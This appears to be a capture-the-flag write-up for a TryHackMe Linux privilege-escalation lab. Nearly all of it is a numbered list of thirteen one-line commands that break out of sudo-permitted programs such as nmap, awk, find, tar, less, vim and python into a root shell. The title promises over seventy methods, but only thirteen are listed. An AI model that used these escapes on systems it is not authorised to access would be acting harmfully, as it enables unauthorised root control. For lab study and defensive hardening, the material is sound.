70+ WAYS TO GET ROOT — LINUX PRIVILEGE ESCALATION
This write-up is for getting the root shell on Linux and is based on the Linux Privesc Playground room on https://tryhackme.com/
Login to the box using the :- SSH Credentials given — check the room’s details on THM
Here is the list of all the ways which I could have think of at the time of solving this:
1. nmap --interactive; !sh
2. echo “os.execute(‘/bin/sh’)” > shell.nse && sudo nmap --script=shell.nse
3. sudo awk ‘BEGIN {system(“/bin/sh”)}’
4. sudo find /home -exec /bin/bash \;
5. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
6. sudo less /etc/hosts then !/bin/bash
7. sudo bash
8. sudo perl -e ‘exec “/bin/bash”;’
9. sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
10. sudo man man
!/bin/bash
11. sudo vi
:!/bin/bash
12. sudo vim -c ‘!sh’
13. sudo env /bin/bash
